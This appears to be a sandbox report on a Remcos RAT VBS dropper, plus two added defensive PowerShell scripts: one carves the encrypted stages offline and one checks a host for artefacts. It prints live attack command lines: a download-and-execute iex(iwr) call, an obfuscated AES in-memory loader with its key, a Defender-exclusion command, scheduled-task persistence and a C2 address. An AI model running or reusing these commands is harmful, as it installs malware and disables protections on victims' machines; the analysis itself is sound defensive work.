Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system -
submitted
03-12-2024 22:47
Static task
static1
Behavioral task
behavioral1
Sample
ETL3M_remcos.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ETL3M_remcos.vbs
Resource
win10v2004-20241007-en
General
-
Target
ETL3M_remcos.vbs
-
Size
563KB
-
MD5
f7c17bfb4247e64e22dd52540a4b903b
-
SHA1
368ba4d02df294fa42efee5e4f330d5e7260d0c3
-
SHA256
23ca901cd7f4f0ca6b2a652c7467911756241a02e37ebf60c6c09c6224478622
-
SHA512
5f79d697ba68f6d285d56b8f38587774eb95162be0af3080a14ea9e277b0b33e3c20c8ccd74c6dddcc06eff3aed36b2c5bb096a8b92101c6f27d2603dfb136a4
-
SSDEEP
12288:eQO27ODRJ7gfddv13rIJQ9HmFboRCuo52CDm09LghGmQ3DnIE2YgdhhC:eN27a7mMJQl2Ac4CDdg8mQPGhhC
Malware Config
Extracted
remcos
RemoteHost
41.216.183.218:56792
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-I5RS8V
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 3 IoCs
Processes:
flow  pid   Process
5     1036  powershell.exe
43    4804  powershell.exe
45    4804  powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
pid   Process
1400  powershell.exe
1020  powershell.exe
3856  powershell.exe
4104  powershell.exe
428   powershell.exe
1036  powershell.exe
3060  powershell.exe
.NET Reactor protector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource: behavioral2/memory/4804-214-0x0000000004F20000-0x0000000004F76000-memory.dmp
yara_rule: net_reactor
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description: Key value queried
ioc: \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation
Process: WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
Processes:
description: File opened for modification
ioc: C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk
Process: powershell.exe
Note the literal, unexpanded %AppData% token in the path: it was resolved relative to powershell.exe's working directory (System32) rather than the user's roaming profile, so this signature reflects a botched variable expansion rather than a deliberate write into System32.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description: Key opened
ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Process: 11 entries in total, 8 from powershell.exe and 3 from cmd.exe
Delays execution with timeout.exe 1 IoCs
Processes:
pid   Process
2256  timeout.exe
Kills process with taskkill 1 IoCs
Processes:
pid   Process
4808  taskkill.exe
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
pid   Process         entries
1036  powershell.exe  2
3060  powershell.exe  2
1400  powershell.exe  2
3932  powershell.exe  2
1020  powershell.exe  2
2964  powershell.exe  2
3856  powershell.exe  2
4804  powershell.exe  2
4104  powershell.exe  2
764   powershell.exe  2
428   powershell.exe  2
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
pid   Process         Token(s), in the order recorded
1036  powershell.exe  SeDebugPrivilege
3060  powershell.exe  SeDebugPrivilege
1400  powershell.exe  SeDebugPrivilege
4808  taskkill.exe    SeDebugPrivilege
3932  powershell.exe  SeDebugPrivilege
1020  powershell.exe  SeDebugPrivilege
2964  powershell.exe  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
3856  powershell.exe  SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36, then a second pass: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege (listing capped at 64 entries)
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
pid   Process         wrote to memory of  target index  entries
1064  WScript.exe     1036                82            2
1036  powershell.exe  3060                84            2
3060  powershell.exe  1992                86            2
1992  csc.exe         3188                87            2
3060  powershell.exe  1652                88            2
1064  WScript.exe     4256                102           2
4256  cmd.exe         852                 104           2
852   cmd.exe         4868                106           2
852   cmd.exe         3932                107           3
3932  powershell.exe  1020                108           3
3932  powershell.exe  2964                109           3
3932  powershell.exe  3856                112           3
3932  powershell.exe  4120                114           3
4120  cmd.exe         2916                116           3
2916  cmd.exe         1568                118           3
2916  cmd.exe         4804                119           3
4804  powershell.exe  4104                120           3
852   cmd.exe         2256                121           2
4804  powershell.exe  764                 122           3
4804  powershell.exe  428                 124           3
Processes
(tree depth in brackets; each entry gives the image, the PID, the full command line, then the signatures that fired on it)

[1] C:\Windows\System32\WScript.exe (PID 1064)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ETL3M_remcos.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1036)
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder/refs/heads/main/remcos.ps1' -UseBasicParsing)"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3060)
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand 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 -inputFormat xml -outputFormat text
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 1992)
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zafaddvf\zafaddvf.cmdline"
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 3188)
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83B7.tmp" "c:\Users\Admin\AppData\Local\Temp\zafaddvf\CSC9B49175D5FE443E08CDBC647BCE6790.TMP"
            [4] C:\windows\system32\cmstp.exe (PID 1652)
                "C:\windows\system32\cmstp.exe" /au C:\windows\temp\wbbnatzg.inf
    [2] C:\Windows\system32\cmd.exe (PID 4256)
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\cmd.exe (PID 852)
            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\cmd.exe (PID 4868)
                C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "
            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3932)
                C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1020)
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    - Command and Scripting Interpreter: PowerShell
                    - System Location Discovery: System Language Discovery
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2964)
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')
                    - System Location Discovery: System Language Discovery
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3856)
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 73846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network73846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    - Command and Scripting Interpreter: PowerShell
                    - System Location Discovery: System Language Discovery
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                [5] C:\Windows\SysWOW64\cmd.exe (PID 4120)
                    "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network73846Man.cmd"
                    - System Location Discovery: System Language Discovery
                    - Suspicious use of WriteProcessMemory
                    [6] C:\Windows\SysWOW64\cmd.exe (PID 2916)
                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network73846Man.cmd"
                        - System Location Discovery: System Language Discovery
                        - Suspicious use of WriteProcessMemory
                        [7] C:\Windows\SysWOW64\cmd.exe (PID 1568)
                            C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network73846Man.cmd';$QkEK='SplexkUitexkU'.Replace('exkU', ''),'CbUqOrbUqOeabUqOtebUqODecbUqOrbUqOybUqOpbUqOtorbUqO'.Replace('bUqO', ''),'MZgfwaiZgfwnMoZgfwdulZgfweZgfw'.Replace('Zgfw', ''),'FrbSRYomBbSRYasbSRYe6bSRY4StbSRYribSRYnbSRYgbSRY'.Replace('bSRY', ''),'DecaHWxomaHWxpraHWxesaHWxsaHWx'.Replace('aHWx', ''),'IMSwmnMSwmvoMSwmkMSwmeMSwm'.Replace('MSwm', ''),'CoHbycpyTHbycoHbyc'.Replace('Hbyc', ''),'GeBtWttCuBtWtrBtWtrBtWtenBtWttPrBtWtocBtWtessBtWt'.Replace('BtWt', ''),'EynVQntynVQrynVQyPoynVQintynVQ'.Replace('ynVQ', ''),'ChsWdlansWdlgesWdlEsWdlxsWdltesWdlnsWdlsisWdlosWdlnsWdl'.Replace('sWdl', ''),'LHcgboadHcgb'.Replace('Hcgb', ''),'RtuYueatuYudLtuYuituYunetuYustuYu'.Replace('tuYu', ''),'EleDFGgmeDFGgnDFGgtDFGgAtDFGg'.Replace('DFGg', ''),'ThSmVranhSmVsfhSmVormhSmVFihSmVnahSmVlBhSmVlohSmVckhSmV'.Replace('hSmV', '');powershell -w hidden;function zUhpG($Vgbyz){$emkHJ=[System.Security.Cryptography.Aes]::Create();$emkHJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$emkHJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$emkHJ.Key=[System.Convert]::($QkEK[3])('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=');$emkHJ.IV=[System.Convert]::($QkEK[3])('Tm3jafLgvfKY6mYPS/HLjQ==');$uFrFo=$emkHJ.($QkEK[1])();$ghdHz=$uFrFo.($QkEK[13])($Vgbyz,0,$Vgbyz.Length);$uFrFo.Dispose();$emkHJ.Dispose();$ghdHz;}function yGhYh($Vgbyz){$BiDCz=New-Object System.IO.MemoryStream(,$Vgbyz);$rDAyB=New-Object System.IO.MemoryStream;$gTfnb=New-Object System.IO.Compression.GZipStream($BiDCz,[IO.Compression.CompressionMode]::($QkEK[4]));$gTfnb.($QkEK[6])($rDAyB);$gTfnb.Dispose();$BiDCz.Dispose();$rDAyB.Dispose();$rDAyB.ToArray();}$GQdwM=[System.IO.File]::($QkEK[11])([Console]::Title);$asQpo=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 5).Substring(2))));$wqKmU=yGhYh (zUhpG ([Convert]::($QkEK[3])([System.Linq.Enumerable]::($QkEK[12])($GQdwM, 6).Substring(2))));[System.Reflection.Assembly]::($QkEK[10])([byte[]]$wqKmU).($QkEK[8]).($QkEK[5])($null,$null);[System.Reflection.Assembly]::($QkEK[10])([byte[]]$asQpo).($QkEK[8]).($QkEK[5])($null,$null); "
                            - System Location Discovery: System Language Discovery
                        [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4804)
                            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            - Blocklisted process makes network request
                            - System Location Discovery: System Language Discovery
                            - Suspicious behavior: EnumeratesProcesses
                            - Suspicious use of WriteProcessMemory
                            [8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4104)
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                - Command and Scripting Interpreter: PowerShell
                                - System Location Discovery: System Language Discovery
                                - Suspicious behavior: EnumeratesProcesses
                            [8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 764)
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network73846Man')
                                - System Location Discovery: System Language Discovery
                                - Suspicious behavior: EnumeratesProcesses
                            [8] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 428)
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 73846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network73846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                - Command and Scripting Interpreter: PowerShell
                                - System Location Discovery: System Language Discovery
                                - Suspicious behavior: EnumeratesProcesses
            [4] C:\Windows\system32\timeout.exe (PID 2256)
                timeout /nobreak /t 1
                - Delays execution with timeout.exe

[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1400, no recorded parent)
    powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess Powershell.exe
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\taskkill.exe (PID 4808, no recorded parent)
    taskkill /IM cmstp.exe /F
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
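The two batch files in the tree (n1.bat, then its %AppData% copy Network73846Man.cmd) carry their own payload. The echo'd PowerShell sets the console title to the batch file's path, ReadLines() that file, takes the lines at zero-based index 5 and 6, drops their first two characters, Base64-decodes, AES-CBC-decrypts with the key and IV hard-coded in the command line (32-byte key, so AES-256), gunzips, and Assembly.Load()s each result, invoking its EntryPoint (the index-6 blob first, then index 5). The $QkEK array is only string-splicing obfuscation and resolves to Split, CreateDecryptor, MainModule, FromBase64String, Decompress, Invoke, CopyTo, GetCurrentProcess, EntryPoint, ChangeExtension, Load, ReadLines, ElementAt, TransformFinalBlock. The script below is an added example, not part of the report and not the loader's own code: it replays the decrypt and decompress steps over a copy of the dropper and writes the two stages to disk instead of loading them, so they can be hashed and opened in a .NET decompiler (the .NET Reactor hit in PID 4804's memory is where one of them ends up). The dropper path, the output directory and the assumption that the two skipped characters are a batch comment prefix are mine.

```powershell
# Carve-Stages.ps1 (added example; not from the report or the malware).
# Replays the loader's decrypt/decompress chain offline and never calls
# Assembly.Load on the result.
param(
    [Parameter(Mandatory = $true)][string] $DropperPath,   # assumed: local copy of n1.bat / Network73846Man.cmd
    [string] $OutDir = (Join-Path $PWD 'carved')            # assumed output location
)

# Key and IV exactly as hard-coded in the captured command line.
$Key = [Convert]::FromBase64String('/Hfk3/0HindNj+4DXkevo5htFNrm49tWPnBdwypza2U=')  # 32 bytes -> AES-256
$IV  = [Convert]::FromBase64String('Tm3jafLgvfKY6mYPS/HLjQ==')                      # 16 bytes

# Mirrors zUhpG(): AES-CBC, PKCS7, one TransformFinalBlock over the whole blob.
function Unprotect-Stage {
    param([byte[]] $CipherText)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    $dec = $aes.CreateDecryptor()
    try {
        [byte[]] $plain = $dec.TransformFinalBlock($CipherText, 0, $CipherText.Length)
        return ,$plain                      # comma keeps the byte[] intact on the pipeline
    } finally {
        $dec.Dispose(); $aes.Dispose()
    }
}

# Mirrors yGhYh(): GZip decompress into a MemoryStream.
function Expand-Stage {
    param([byte[]] $Compressed)
    $in  = [System.IO.MemoryStream]::new($Compressed)
    $out = [System.IO.MemoryStream]::new()
    $gz  = [System.IO.Compression.GZipStream]::new($in, [System.IO.Compression.CompressionMode]::Decompress)
    try {
        $gz.CopyTo($out)
        [byte[]] $raw = $out.ToArray()
        return ,$raw
    } finally {
        $gz.Dispose(); $in.Dispose(); $out.Dispose()
    }
}

# The loader reads its own file via [Console]::Title. ElementAt() is zero-based,
# so indices 5 and 6 are the sixth and seventh lines. Substring(2) skips a
# two-character prefix; assumed here to be a comment marker that stops cmd.exe
# from executing the Base64 text (the report does not show the dropper body).
$lines = [System.IO.File]::ReadAllLines($DropperPath)
if ($lines.Count -lt 7) {
    throw "Expected at least 7 lines in $DropperPath, found $($lines.Count)"
}

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

# Same order the loader uses: index 6 ($wqKmU) is loaded and invoked first.
$stages = @(
    @{ Index = 6; Name = 'stage_line7_loaded_first'  },
    @{ Index = 5; Name = 'stage_line6_loaded_second' }
)
foreach ($s in $stages) {
    $blob  = [Convert]::FromBase64String($lines[$s.Index].Substring(2))
    $plain = Expand-Stage (Unprotect-Stage $blob)
    $dest  = Join-Path $OutDir ($s.Name + '.bin')
    [System.IO.File]::WriteAllBytes($dest, $plain)

    # 'MZ' at offset 0 marks a PE; for this loader that means a .NET assembly.
    $looksPe = ($plain.Length -gt 2 -and $plain[0] -eq 0x4D -and $plain[1] -eq 0x5A)
    [PSCustomObject]@{
        SourceLine = $s.Index + 1
        Bytes      = $plain.Length
        LooksPE    = $looksPe
        SHA256     = (Get-FileHash -Algorithm SHA256 -LiteralPath $dest).Hash
        Output     = $dest
    }
}
```

Run it on an isolated analysis box as `.\Carve-Stages.ps1 -DropperPath .\Network73846Man.cmd`; nothing in it executes the carved assemblies. A padding exception from TransformFinalBlock means the line indices, the prefix length or the key differ from this run, which is the first thing to re-check against the echo'd script of a new sample.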
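Persistence and defence evasion in this run are ordinary host artefacts: a logon task 'OneNote 73846' that starts %AppData%\Network73846Man.cmd with -RunLevel Highest (registered once per stage, PIDs 3856 and 428, after a Get-ScheduledTask check for an existing entry), Defender exclusions for C:\ and Powershell.exe added by PID 1400, cmstp.exe launched with an INF from C:\windows\temp and then force-killed with taskkill, and the Remcos mutex Rmc-I5RS8V from the extracted config. The read-only triage script below is an added example, not from the report; the task name, file names, exclusion values and mutex are taken from the report, while the paths assumed for the configured Remcos copy (copy_folder\copy_file) and keylog file are mine, since the config gives only folder and file names and install_flag/keylog_flag were false in this run.

```powershell
# Find-RemcosArtifacts.ps1 (added example; not part of the sandbox report).
# Read-only checks for the artefacts this run left behind; nothing is removed.
$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding {
    param([string] $Category, [string] $Detail)
    $findings.Add([PSCustomObject]@{ Category = $Category; Detail = $Detail })
}

# 1. Scheduled tasks. Flag the exact name from the report and, more usefully,
#    any logon-triggered task whose action runs out of a user profile.
foreach ($task in @(Get-ScheduledTask -ErrorAction SilentlyContinue)) {
    $logonTriggers = @($task.Triggers | Where-Object {
        $_.CimClass.CimClassName -eq 'MSFT_TaskLogonTrigger' })
    foreach ($action in @($task.Actions)) {
        $exe = [string]$action.Execute
        $fromProfile = $exe -match '(?i)\\AppData\\(Roaming|Local)\\'
        if ($task.TaskName -eq 'OneNote 73846' -or ($logonTriggers.Count -gt 0 -and $fromProfile)) {
            Add-Finding 'ScheduledTask' ('{0}{1} -> {2} {3} (RunLevel={4})' -f
                $task.TaskPath, $task.TaskName, $exe, $action.Arguments, $task.Principal.RunLevel)
        }
    }
}

# 2. Defender exclusions set by PID 1400 (Add-MpPreference -ExclusionPath C:\
#    -ExclusionProcess Powershell.exe). A whole-drive or interpreter exclusion
#    has no legitimate baseline.
$pref = Get-MpPreference -ErrorAction SilentlyContinue
if ($pref) {
    foreach ($p in @($pref.ExclusionPath)) {
        if ($p -and $p -match '^[A-Za-z]:\\?$') { Add-Finding 'DefenderExclusionPath' $p }
    }
    foreach ($p in @($pref.ExclusionProcess)) {
        if ($p -and $p -match '(?i)powershell') { Add-Finding 'DefenderExclusionProcess' $p }
    }
}

# 3. Dropped files named in the report, plus the configured Remcos copy and
#    keylog locations (assumed to resolve under %AppData%, as screenshot_path does).
$candidates = @(
    (Join-Path $env:APPDATA 'Network73846Man.cmd'),
    (Join-Path $env:TEMP    'n1.bat'),
    (Join-Path $env:APPDATA 'Remcos\remcos.exe'),   # assumption: copy_folder\copy_file
    (Join-Path $env:APPDATA 'remcos\logs.dat')      # assumption: keylog_folder\keylog_file
)
foreach ($f in $candidates) {
    if (Test-Path -LiteralPath $f) {
        $h = (Get-FileHash -Algorithm SHA256 -LiteralPath $f).Hash
        Add-Finding 'DroppedFile' "$f (SHA256 $h)"
    }
}

# 4. Remcos mutex from the extracted config. OpenExisting succeeds only if a
#    live process owns the name; access-denied also means it exists. Both the
#    session-local and Global namespace are tried because the report does not
#    say which one the implant uses.
foreach ($name in 'Rmc-I5RS8V', 'Global\Rmc-I5RS8V') {
    try {
        $m = [System.Threading.Mutex]::OpenExisting($name)
        $m.Dispose()
        Add-Finding 'Mutex' "$name is present (Remcos likely running)"
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        # not present in this namespace
    } catch [System.UnauthorizedAccessException] {
        Add-Finding 'Mutex' "$name exists but is not accessible from this context"
    }
}

if ($findings.Count -eq 0) { Write-Host 'No Remcos/loader artefacts found on this host.' }
$findings
```

Run it elevated so Get-MpPreference and the task enumeration see everything; a hit in the ScheduledTask or DefenderExclusion categories is worth acting on even when the file and mutex checks are empty, because the task re-creates the whole chain at the next logon.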
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
2KB
MD5
d85ba6ff808d9e5444a4b369f5bc2730
SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5
938ffc2cba917b243d86b2cf76dcefb4
SHA1
234b53d91d075f16cc63c731eefdae278e2faad3
SHA256
5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca
SHA512
e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314
-
Filesize
21KB
MD5
4f7ec23d676489b635e107c69513d704
SHA1
8c5fe44249014df160f1a2ec001383b3e9b1574a
SHA256
d8015174965e2931c5a67a1f46d8f71c886cebb78a09b6f87d406c37387fc210
SHA512
cb23fc176bf27c465e5f3a47e6844593d1819dc58a07cbcbb883a9fa84eeea3bd7eb9ea5d15fe90a56033395f59fb0a04603741da5663d06859a70c41583afcc
-
Filesize
20KB
MD5
8fd86c800cebce525814cce7d2f7f399
SHA1
3597b4d487504a19c97f8cd13a12f00719ec3dd1
SHA256
a89c1934e5b6ac80036ca23b92176a7f6c6ec598e5dbfc5de2e223967d28e192
SHA512
8fc19f70ffff4ab85d73f5266cca45e78e68be9d7c583f5c5d8cdd02e5d32fe822046c45ba3d54fa2e0d983548c829ebe59524f143238ea4f10c3c31cab1de4d
-
Filesize
21KB
MD5
21245d35baff5f735b94db3c395a2570
SHA1
878352812b5c1d25e0c2ab2889e00d8cc995ac3e
SHA256
a1504a91105539a7aee90227539000f88a10994b25a36976f94c3feb5c266ab8
SHA512
